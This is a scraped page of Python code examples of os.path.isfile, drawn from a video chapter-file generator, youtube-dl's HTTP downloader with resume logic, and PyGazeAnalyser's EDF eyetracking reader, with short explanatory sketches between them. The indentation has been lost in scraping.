# Set mkvinfo path
from vfr import mkvmerge, parse_with_mkvinfo, fmt_time
from os.path import dirname, join, isfile
if parse_with_mkvinfo:
mkvinfo_path = join(dirname(mkvmerge), 'mkvinfo')
if not isfile(mkvinfo_path) and not isfile(mkvinfo_path + '.exe'):
import os
from subprocess import check_call, CalledProcessError
which = 'where' if os.name == 'nt' else 'which'
try:
check_call([which, 'mkvinfo'])
except CalledProcessError:
parse_with_mkvinfo = False
# Set placeholder for mkvinfo output
mkv_globbed = False
mkvinfo = {}
for k, v in config.items('info'):
if k == 'lang':
self.lang = v.split(',')
elif k == 'country':
self.country = v.split(',')
elif k == 'inputfps':
self.fps = v
elif k == 'outputfps':
self.ofps = v
elif k == 'createqpfile':
self.qpf = v
elif k == 'uid':
self.uid = int(v)
elif k == 'editions':
self.num_editions = int(v)
if avs and not ifps:
self.connect_with_vfr(avs, label, clip)
elif trims:
self.trims = trims
self.kframes = kframes
else:
self.trims = False
self.idr = idr
for i in range(self.num_editions):
from re import compile
ed = self.Edition()
ed.uid = self.uid * 100
self.uid += 1
cuid = ed.uid
ed.num = i+1
ed.chapters = []
stuff = {}
for k, v in config.items('edition{0:d}'.format(ed.num)):
if k == 'default':
ed.default = int(v)
elif k == 'name':
ed.name = v.split(',')
elif k == 'ordered':
ed.ordered = int(v)
elif k == 'hidden':
ed.hidden = int(v)
elif k == 'chapters':
ed.num_chapters = int(v)
for i in range(ed.num_chapters):
stuff[i+1] = []
elif k == 'uid':
ed.uid = int(v)
else:
opt_re = compile(r'(\d+)(\w+)')
ret = opt_re.search(k)
if ret:
stuff[int(ret.group(1))].append((ret.group(2),v))
for j in range(ed.num_chapters):
ch = self.Chapter()
cuid += 1
ch.uid = cuid
ch.num = j+1
for k, v in stuff[j+1]:
if k == 'name':
ch.name = v.split(',')
elif k == 'chapter':
ch.chapter = int(v)
elif k == 'start':
ch.start = v
elif k == 'end':
ch.end = v
elif k == 'suid':
ch.suid = v.strip() if ret else 0
elif k == 'hidden':
ch.hidden = int(v)
elif k == 'enabled':
ch.enabled = int(v)
if ch.suid and not isfile(ch.suid):
ch.suid = ch.suid.replace('0x','').lower().replace(' ','')
if ch.chapter and not (ch.start and ch.end):
ch.start, ch.end = self.trims[ch.chapter-1] if self.trims else (ch.start, ch.end)
elif ch.suid:
mkvfiles = []
if isfile(ch.suid):
mkvfiles = [ch.suid]
elif not mkv_globbed:
from glob import glob
mkvfiles = glob('*.mkv') + glob(join(dirname(avs),'*.mkv'))
mkv_globbed = True
if mkvfiles:
if parse_with_mkvinfo:
from subprocess import check_output
suid_re = compile(r'(?m)^\| \+ Segment UID:(.*)')
duration_re = compile(r'(?m)^\| \+ Duration: \d+\.\d*s \((\d+:\d+:\d+.\d+)\)')
for file in mkvfiles:
info = check_output([mkvinfo_path, '--ui-language', 'en', '--output-charset', 'utf-8', file]).decode('utf-8')
ret = suid_re.search(info)
ch.suid = ret.group(1).lower().strip().replace('0x','').replace(' ','') if ret else 0
ret = duration_re.search(info)
duration = ret.group(1) if ret else 0
mkvinfo[ch.suid] = {'file': file, 'duration': duration}
else:
for file in mkvfiles:
ch.suid, duration = self.parse_mkv(file)
mkvinfo[ch.suid] = {'file': file,
'duration': fmt_time(duration * 10**6)
if duration else 0}
if not (ch.start or ch.end):
ch.start = fmt_time(0) if not ch.start else ch.start
ch.end = mkvinfo[ch.suid]['duration'] if not ch.end and (ch.suid in mkvinfo) else ch.end
ed.chapters.append(ch)
self.editions.append(ed)
if output:
self.toxml(output)
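
Besides matching chapter SUIDs against existing files with isfile(), the example above locates mkvinfo by first testing a candidate path with os.path.isfile and then falling back to the platform's lookup command. A self-contained sketch of that discovery step follows; the function name and the fallback return values are assumptions for illustration, not part of vfr's API.

import os
from subprocess import check_call, CalledProcessError

def find_mkvinfo(candidate):
    # Prefer an explicit path next to mkvmerge; accept a Windows .exe too.
    if os.path.isfile(candidate) or os.path.isfile(candidate + '.exe'):
        return candidate
    # Fall back to asking the shell's lookup command whether the tool exists.
    which = 'where' if os.name == 'nt' else 'which'
    try:
        check_call([which, 'mkvinfo'])
        return 'mkvinfo'
    except (CalledProcessError, OSError):
        return None
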
0
Example 99
def real_download(self, filename, info_dict):
url = info_dict['url']
tmpfilename = self.temp_name(filename)
stream = None
# Do not include the Accept-Encoding header
headers = {'Youtubedl-no-compression': 'True'}
if 'user_agent' in info_dict:
headers['Youtubedl-user-agent'] = info_dict['user_agent']
if 'http_referer' in info_dict:
headers['Referer'] = info_dict['http_referer']
add_headers = info_dict.get('http_headers')
if add_headers:
headers.update(add_headers)
data = info_dict.get('http_post_data')
http_method = info_dict.get('http_method')
basic_request = compat_urllib_request.Request(url, data, headers)
request = compat_urllib_request.Request(url, data, headers)
if http_method is not None:
basic_request.get_method = lambda: http_method
request.get_method = lambda: http_method
is_test = self.params.get('test', False)
if is_test:
request.add_header('Range', 'bytes=0-%s' % str(self._TEST_FILE_SIZE - 1))
# Establish possible resume length
if os.path.isfile(encodeFilename(tmpfilename)):
resume_len = os.path.getsize(encodeFilename(tmpfilename))
else:
resume_len = 0
open_mode = 'wb'
if resume_len != 0:
if self.params.get('continuedl', False):
self.report_resuming_byte(resume_len)
request.add_header('Range', 'bytes=%d-' % resume_len)
open_mode = 'ab'
else:
resume_len = 0
count = 0
retries = self.params.get('retries', 0)
while count <= retries:
# Establish connection
try:
data = self.ydl.urlopen(request)
break
except (compat_urllib_error.HTTPError, ) as err:
if (err.code < 500 or err.code >= 600) and err.code != 416:
# Unexpected HTTP error
raise
elif err.code == 416:
# Unable to resume (requested range not satisfiable)
try:
# Open the connection again without the range header
data = self.ydl.urlopen(basic_request)
content_length = data.info()['Content-Length']
except (compat_urllib_error.HTTPError, ) as err:
if err.code < 500 or err.code >= 600:
raise
else:
# Examine the reported length
if (content_length is not None and
(resume_len - 100 < int(content_length) < resume_len + 100)):
# The file had already been fully downloaded.
# Explanation to the above condition: in issue #175 it was revealed that
# YouTube sometimes adds or removes a few bytes from the end of the file,
# changing the file size slightly and causing problems for some users. So
# I decided to implement a suggested change and consider the file
# completely downloaded if the file size differs less than 100 bytes from
# the one in the hard drive.
self.report_file_already_downloaded(filename)
self.try_rename(tmpfilename, filename)
self._hook_progress({
'filename': filename,
'status': 'finished',
})
return True
else:
# The length does not match, we start the download over
self.report_unable_to_resume()
resume_len = 0
open_mode = 'wb'
break
# Retry
count += 1
if count <= retries:
self.report_retry(count, retries)
if count > retries:
self.report_error('giving up after %s retries' % retries)
return False
data_len = data.info().get('Content-length', None)
# Range HTTP header may be ignored/unsupported by a webserver
# (e.g. extractor/scivee.py, extractor/bambuser.py).
# However, for a test we still would like to download just a piece of a file.
# To achieve this we limit data_len to _TEST_FILE_SIZE and manually control
# block size when downloading a file.
if is_test and (data_len is None or int(data_len) > self._TEST_FILE_SIZE):
data_len = self._TEST_FILE_SIZE
if data_len is not None:
data_len = int(data_len) + resume_len
min_data_len = self.params.get("min_filesize", None)
max_data_len = self.params.get("max_filesize", None)
if min_data_len is not None and data_len < min_data_len:
self.to_screen('\r[download] File is smaller than min-filesize (%s bytes < %s bytes). Aborting.' % (data_len, min_data_len))
return False
if max_data_len is not None and data_len > max_data_len:
self.to_screen('\r[download] File is larger than max-filesize (%s bytes > %s bytes). Aborting.' % (data_len, max_data_len))
return False
data_len_str = format_bytes(data_len)
byte_counter = 0 + resume_len
block_size = self.params.get('buffersize', 1024)
start = time.time()
# measure time over whole while-loop, so slow_down() and best_block_size() work together properly
now = None # needed for slow_down() in the first loop run
before = start # start measuring
while True:
# Download and write
data_block = data.read(block_size if not is_test else min(block_size, data_len - byte_counter))
byte_counter += len(data_block)
# exit loop when download is finished
if len(data_block) == 0:
break
# Open destination file just in time
if stream is None:
try:
(stream, tmpfilename) = sanitize_open(tmpfilename, open_mode)
assert stream is not None
filename = self.undo_temp_name(tmpfilename)
self.report_destination(filename)
except (OSError, IOError) as err:
self.report_error('unable to open for writing: %s' % str(err))
return False
try:
stream.write(data_block)
except (IOError, OSError) as err:
self.to_stderr('\n')
self.report_error('unable to write data: %s' % str(err))
return False
# Apply rate limit
self.slow_down(start, now, byte_counter - resume_len)
# end measuring of one loop run
now = time.time()
after = now
# Adjust block size
if not self.params.get('noresizebuffer', False):
block_size = self.best_block_size(after - before, len(data_block))
before = after
# Progress message
speed = self.calc_speed(start, now, byte_counter - resume_len)
if data_len is None:
eta = percent = None
else:
percent = self.calc_percent(byte_counter, data_len)
eta = self.calc_eta(start, time.time(), data_len - resume_len, byte_counter - resume_len)
self.report_progress(percent, data_len_str, speed, eta)
self._hook_progress({
'downloaded_bytes': byte_counter,
'total_bytes': data_len,
'tmpfilename': tmpfilename,
'filename': filename,
'status': 'downloading',
'eta': eta,
'speed': speed,
})
if is_test and byte_counter == data_len:
break
if stream is None:
self.to_stderr('\n')
self.report_error('Did not get any data blocks')
return False
if tmpfilename != '-':
stream.close()
self.report_finish(data_len_str, (time.time() - start))
if data_len is not None and byte_counter != data_len:
raise ContentTooShortError(byte_counter, int(data_len))
self.try_rename(tmpfilename, filename)
# Update file modification time
if self.params.get('updatetime', True):
info_dict['filetime'] = self.try_utime(filename, data.info().get('last-modified', None))
self._hook_progress({
'downloaded_bytes': byte_counter,
'total_bytes': byte_counter,
'filename': filename,
'status': 'finished',
})
return True
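
In this downloader, os.path.isfile decides whether a partially downloaded temporary file already exists, and its size then seeds the resume offset and the file open mode. The sketch below isolates just that decision; it is a simplified illustration, not youtube-dl's actual helper.

import os

def resume_state(tmpfilename, continuedl=True):
    # If a partial file is already on disk, resume by appending from its size;
    # otherwise (or when resuming is disabled) start over and truncate.
    if os.path.isfile(tmpfilename):
        resume_len = os.path.getsize(tmpfilename)
    else:
        resume_len = 0
    if resume_len and continuedl:
        return resume_len, 'ab'
    return 0, 'wb'

# Example: build a Range header from the offset.
# offset, mode = resume_state('clip.mp4.part')
# headers = {'Range': 'bytes=%d-' % offset} if offset else {}
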
0
Example 100
Project: PyGazeAnalyser Source File: edfreader.py
def read_edf(filename, start, stop=None, missing=0.0, debug=False):
"""Returns a list with dicts for every trial. A trial dict contains the
following keys:
x - numpy array of x positions
y - numpy array of y positions
size - numpy array of pupil size
time - numpy array of timestamps, t=0 at trialstart
trackertime - numpy array of timestamps, according to EDF
events - dict with the following keys:
Sfix - list of lists, each containing [starttime]
Ssac - list of lists, each containing [starttime]
Sblk - list of lists, each containing [starttime]
Efix - list of lists, each containing [starttime, endtime, duration, endx, endy]
Esac - list of lists, each containing [starttime, endtime, duration, startx, starty, endx, endy]
Eblk - list of lists, each containing [starttime, endtime, duration]
msg - list of lists, each containing [time, message]
NOTE: timing is in EDF time!
arguments
filename - path to the file that has to be read
start - trial start string
keyword arguments
stop - trial ending string (default = None)
missing - value to be used for missing data (default = 0.0)
debug - Boolean indicating if DEBUG mode should be on or off;
if DEBUG mode is on, information on what the script
currently is doing will be printed to the console
(default = False)
returns
data - a list with a dict for every trial (see above)
"""
# # # # #
# debug mode
if debug:
def message(msg):
print(msg)
else:
def message(msg):
pass
# # # # #
# file handling
# check if the file exists
if os.path.isfile(filename):
# open file
message("opening file '%s'" % filename)
f = open(filename, 'r')
# raise exception if the file does not exist
else:
raise Exception("Error in read_edf: file '%s' does not exist" % filename)
# read file contents
message("reading file '%s'" % filename)
raw = f.readlines()
# close file
message("closing file '%s'" % filename)
f.close()
# # # # #
# parse lines
# variables
data = []
x = []
y = []
size = []
time = []
trackertime = []
events = {'Sfix':[],'Ssac':[],'Sblk':[],'Efix':[],'Esac':[],'Eblk':[],'msg':[]}
starttime = 0
started = False
trialend = False
finalline = raw[-1]
# loop through all lines
for line in raw:
# check if trial has already started
if started:
# only check for stop if there is one
if stop is not None:
if stop in line:
started = False
trialend = True
# check for new start otherwise
else:
if (start in line) or (line == finalline):
started = True
trialend = True
# # # # #
# trial ending
if trialend:
message("trialend %d; %d samples found" % (len(data),len(x)))
# trial dict
trial = {}
trial['x'] = numpy.array(x)
trial['y'] = numpy.array(y)
trial['size'] = numpy.array(size)
trial['time'] = numpy.array(time)
trial['trackertime'] = numpy.array(trackertime)
trial['events'] = copy.deepcopy(events)
# add trial to data
data.append(trial)
# reset stuff
x = []
y = []
size = []
time = []
trackertime = []
events = {'Sfix':[],'Ssac':[],'Sblk':[],'Efix':[],'Esac':[],'Eblk':[],'msg':[]}
trialend = False
# check if the current line contains start message
else:
if start in line:
message("trialstart %d" % len(data))
# set started to True
started = True
# find starting time
starttime = int(line[line.find('\t')+1:line.find(' ')])
# # # # #
# parse line
if started:
# message lines will start with MSG, followed by a tab, then a
# timestamp, a space, and finally the message, e.g.:
# "MSG\t12345 something of importance here"
if line[0:3] == "MSG":
ms = line.find(" ") # message start
t = int(line[4:ms]) # time
m = line[ms+1:] # message
events['msg'].append([t,m])
# EDF event lines are constructed of 9 characters, followed by
# tab separated values; these values MAY CONTAIN SPACES, but
# these spaces are ignored by float() (thank you Python!)
# fixation start
elif line[0:4] == "SFIX":
message("fixation start")
l = line[9:]
events['Sfix'].append(int(l))
# fixation end
elif line[0:4] == "EFIX":
message("fixation end")
l = line[9:]
l = l.split('\t')
st = int(l[0]) # starting time
et = int(l[1]) # ending time
dur = int(l[2]) # duration
sx = replace_missing(l[3], missing=missing) # x position
sy = replace_missing(l[4], missing=missing) # y position
events['Efix'].append([st, et, dur, sx, sy])
# saccade start
elif line[0:5] == 'SSACC':
message("saccade start")
l = line[9:]
events['Ssac'].append(int(l))
# saccade end
elif line[0:5] == "ESACC":
message("saccade end")
l = line[9:]
l = l.split('\t')
st = int(l[0]) # starting time
et = int(l[1]) # ending time
dur = int(l[2]) # duration
sx = replace_missing(l[3], missing=missing) # start x position
sy = replace_missing(l[4], missing=missing) # start y position
ex = replace_missing(l[5], missing=missing) # end x position
ey = replace_missing(l[6], missing=missing) # end y position
events['Esac'].append([st, et, dur, sx, sy, ex, ey])
# blink start
elif line[0:6] == "SBLINK":
message("blink start")
l = line[9:]
events['Sblk'].append(int(l))
# blink end
elif line[0:6] == "EBLINK":
message("blink end")
l = line[9:]
l = l.split('\t')
st = int(l[0])
et = int(l[1])
dur = int(l[2])
events['Eblk'].append([st,et,dur])
# regular lines will contain tab separated values, beginning with
# a timestamp, followed by the values that were asked to be stored
# in the EDF and a mysterious '...'. Usually, this comes down to
# timestamp, x, y, pupilsize, ...
# e.g.: "985288\t 504.6\t 368.2\t 4933.0\t..."
# NOTE: these values MAY CONTAIN SPACES, but these spaces are
# ignored by float() (thank you Python!)
else:
# see if current line contains relevant data
try:
# split by tab
l = line.split('\t')
# if first entry is a timestamp, this should work
int(l[0])
except ValueError:
message("line '%s' could not be parsed" % line)
continue # skip this line
# check missing
if float(l[3]) == 0.0:
l[1] = 0.0
l[2] = 0.0
# extract data
x.append(float(l[1]))
y.append(float(l[2]))
size.append(float(l[3]))
time.append(int(l[0])-starttime)
trackertime.append(int(l[0]))
# # # # #
# return
return data
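
A hedged usage sketch for read_edf(), based only on the docstring above: the file path and the start/stop markers below are placeholders and depend on how the EDF was converted and how trials were tagged in the recording.

import os

edf_path = 'participant01.asc'  # hypothetical ASCII-converted EDF file
if os.path.isfile(edf_path):
    trials = read_edf(edf_path, 'TRIALSTART', stop='TRIALEND',
                      missing=0.0, debug=False)
    for i, trial in enumerate(trials):
        print("trial %d: %d samples, %d fixations"
              % (i, len(trial['x']), len(trial['events']['Efix'])))
else:
    print("file '%s' does not exist" % edf_path)
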